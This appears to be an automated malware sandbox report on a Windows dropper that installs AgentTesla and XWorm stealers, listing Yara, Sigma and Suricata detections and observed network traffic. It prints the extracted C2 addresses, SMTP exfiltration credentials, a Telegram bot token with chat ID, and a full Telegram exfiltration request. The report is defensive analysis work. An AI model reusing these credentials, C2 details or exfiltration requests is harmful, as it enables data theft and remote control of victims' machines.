0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3347b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x334ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33577:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33609:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33673:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x336e5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3377b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3380b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x4b5e2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x4b67f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x4b794:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x4a650:$cnc4: POST / HTTP/1.1
Click to see the 43 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 162.254.34.31, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe, Initiated: true, ProcessId: 6404, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49705

Suricata Signatures

ET MALWARE AgentTesla Exfil Via SMTP

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-25T15:36:14.278202+0100	2030171	1	A Network Trojan was detected	192.168.2.5	49705	162.254.34.31	587	TCP

ETPRO MALWARE Agent Tesla CnC Exfil Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-25T15:36:25.737135+0100	2855542	1	A Network Trojan was detected	192.168.2.5	49705	162.254.34.31	587	TCP

ETPRO MALWARE Agent Tesla Exfil via SMTP

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-25T15:36:25.737135+0100	2855245	1	A Network Trojan was detected	192.168.2.5	49705	162.254.34.31	587	TCP

ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-25T15:36:14.278202+0100	2840032	1	A Network Trojan was detected	192.168.2.5	49705	162.254.34.31	587	TCP

ETPRO MALWARE Win32/XWorm Checkin via Telegram

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-25T15:36:25.030421+0100	2853685	1	A Network Trojan was detected	192.168.2.5	49706	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: DJ5PhUwOsM.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Avira: detection malicious, Label: TR/Spy.Gen8

Found malware configuration

Source: 00000003.00000002.4524379102.0000000003341000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Xworm {"C2 url": ["89.40.31.232"], "Port": 1717, "Aes key": "1717", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram Token": "5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk", "Telegram Chatid": "793028759", "Version": "XWorm V5.6"}
Source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxambro@educt.shop", "Password": "ABwuRZS5Mjh5"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	ReversingLabs: Detection: 81%

Multi AV Scanner detection for submitted file

Source: DJ5PhUwOsM.exe

ReversingLabs: Detection: 92%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: DJ5PhUwOsM.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack	String decryptor: 89.40.31.232
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack	String decryptor: 1717
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack	String decryptor: <Xwormmm>
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack	String decryptor: 28Nov2024
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack	String decryptor: USB.exe

Source: DJ5PhUwOsM.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49706 version: TLS 1.2

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.5:49705 -> 162.254.34.31:587
Source: Network traffic	Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49705 -> 162.254.34.31:587
Source: Network traffic	Suricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.5:49705 -> 162.254.34.31:587
Source: Network traffic	Suricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.5:49705 -> 162.254.34.31:587
Source: Network traffic	Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.5:49706 -> 149.154.167.220:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 89.40.31.232

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.FB_7D21.tmp.exe.fa0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe, type: DROPPED

Source: global traffic	TCP traffic: 192.168.2.5:49705 -> 162.254.34.31:587
Source: global traffic	TCP traffic: 192.168.2.5:49707 -> 89.40.31.232:1717

Source: global traffic

HTTP traffic detected: GET /bot5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk/sendMessage?chat_id=793028759&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AEB01AAE6F744B3247914%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20LYRNOABZ9%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%2028Nov2024 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205

Source: Joe Sandbox View	ASN Name: TELEMEDIA-ASRO TELEMEDIA-ASRO
Source: Joe Sandbox View	ASN Name: VIVIDHOSTINGUS VIVIDHOSTINGUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: global traffic

TCP traffic: 192.168.2.5:49705 -> 162.254.34.31:587

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown	TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown	TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown	TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown	TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown	TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown	TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown	TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown	TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown	TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown	TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown	TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown	TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown	TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown	TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown	TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown	TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown	TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown	TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown	TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown	TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown	TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown	TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown	TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown	TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown	TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown	TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown	TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown	TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown	TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown	TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown	TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown	TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown	TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown	TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown	TCP traffic detected without corresponding DNS query: 89.40.31.232
Source: unknown	TCP traffic detected without corresponding DNS query: 89.40.31.232

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk/sendMessage?chat_id=793028759&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AEB01AAE6F744B3247914%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20LYRNOABZ9%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%2028Nov2024 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: FB_7D21.tmp.exe, 00000003.00000002.4527812703.000000001C1DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://microsoft.co
Source: FB_7BD8.tmp.exe, 00000002.00000002.4524594091.0000000002861000.00000004.00000800.00020000.00000000.sdmp, FB_7D21.tmp.exe, 00000003.00000002.4524379102.0000000003341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: DJ5PhUwOsM.exe, FB_7BD8.tmp.exe.0.dr	String found in binary or memory: https://account.dyn.com/
Source: DJ5PhUwOsM.exe, FB_7BD8.tmp.exe.0.dr	String found in binary or memory: https://api.ipify.org
Source: FB_7BD8.tmp.exe, 00000002.00000002.4524594091.0000000002861000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: FB_7BD8.tmp.exe, 00000002.00000002.4524594091.0000000002861000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t
Source: DJ5PhUwOsM.exe, FB_7D21.tmp.exe.0.dr	String found in binary or memory: https://api.telegram.org/bot

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49706 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, SKTzxzsJw.cs	.Net Code: nUAqbab
Source: 0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, SKTzxzsJw.cs	.Net Code: nUAqbab

Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe

Process information set: 01 00 00 00

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: DJ5PhUwOsM.exe, type: SAMPLE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: DJ5PhUwOsM.exe, type: SAMPLE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 3.0.FB_7D21.tmp.exe.fa0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.0.FB_7BD8.tmp.exe.4d0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.DJ5PhUwOsM.exe.4040d0.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.0.DJ5PhUwOsM.exe.4040d0.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.0.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000003.00000000.2070271081.0000000000FA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe, type: DROPPED	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen

Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Code function: 2_2_00E7E270	2_2_00E7E270
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Code function: 2_2_00E7A958	2_2_00E7A958
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Code function: 2_2_00E74A98	2_2_00E74A98
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Code function: 2_2_00E73E80	2_2_00E73E80
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Code function: 2_2_00E741C8	2_2_00E741C8
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Code function: 2_2_00E7C36F	2_2_00E7C36F
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Code function: 2_2_064F5640	2_2_064F5640
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Code function: 2_2_064F6668	2_2_064F6668
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Code function: 2_2_064F7DF0	2_2_064F7DF0
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Code function: 2_2_064FC200	2_2_064FC200
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Code function: 2_2_064FB2A2	2_2_064FB2A2
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Code function: 2_2_064F3100	2_2_064F3100
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Code function: 2_2_064F7710	2_2_064F7710
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Code function: 2_2_064F2409	2_2_064F2409
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Code function: 2_2_064FE418	2_2_064FE418
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Code function: 2_2_064F5D5F	2_2_064F5D5F
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Code function: 2_2_064F0040	2_2_064F0040
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Code function: 2_2_064F0006	2_2_064F0006
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Code function: 3_2_00007FF848F28EF2	3_2_00007FF848F28EF2
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Code function: 3_2_00007FF848F28146	3_2_00007FF848F28146
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	Code function: 3_2_00007FF848F2651D	3_2_00007FF848F2651D

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe FB247F5397BA1B2D9328D1ACC2FD322181A91CED1953853ABB41718DC21198AE

Source: DJ5PhUwOsM.exe	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: DJ5PhUwOsM.exe	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

Source: DJ5PhUwOsM.exe, 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilename6623bc4b-fa2b-443b-b079-7932cd528c3c.exe4 vs DJ5PhUwOsM.exe
Source: DJ5PhUwOsM.exe, 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameRaw.exe4 vs DJ5PhUwOsM.exe
Source: DJ5PhUwOsM.exe, 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameBindStub.exe vs DJ5PhUwOsM.exe
Source: DJ5PhUwOsM.exe	Binary or memory string: OriginalFilename6623bc4b-fa2b-443b-b079-7932cd528c3c.exe4 vs DJ5PhUwOsM.exe
Source: DJ5PhUwOsM.exe	Binary or memory string: OriginalFilenameRaw.exe4 vs DJ5PhUwOsM.exe
Source: DJ5PhUwOsM.exe	Binary or memory string: OriginalFilenameBindStub.exe vs DJ5PhUwOsM.exe

Source: DJ5PhUwOsM.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: DJ5PhUwOsM.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: DJ5PhUwOsM.exe, type: SAMPLE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 3.0.FB_7D21.tmp.exe.fa0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.0.FB_7BD8.tmp.exe.4d0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.DJ5PhUwOsM.exe.4040d0.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.0.DJ5PhUwOsM.exe.4040d0.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.0.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000003.00000000.2070271081.0000000000FA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers

Source: FB_7D21.tmp.exe.0.dr, hMY5B4KaPYBa602NktZ1e4wVF.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: FB_7D21.tmp.exe.0.dr, hMY5B4KaPYBa602NktZ1e4wVF.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: FB_7D21.tmp.exe.0.dr, jK41xlYzptzDvBwid77hpLBxe.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, 4JJG6X.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, 4JJG6X.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'
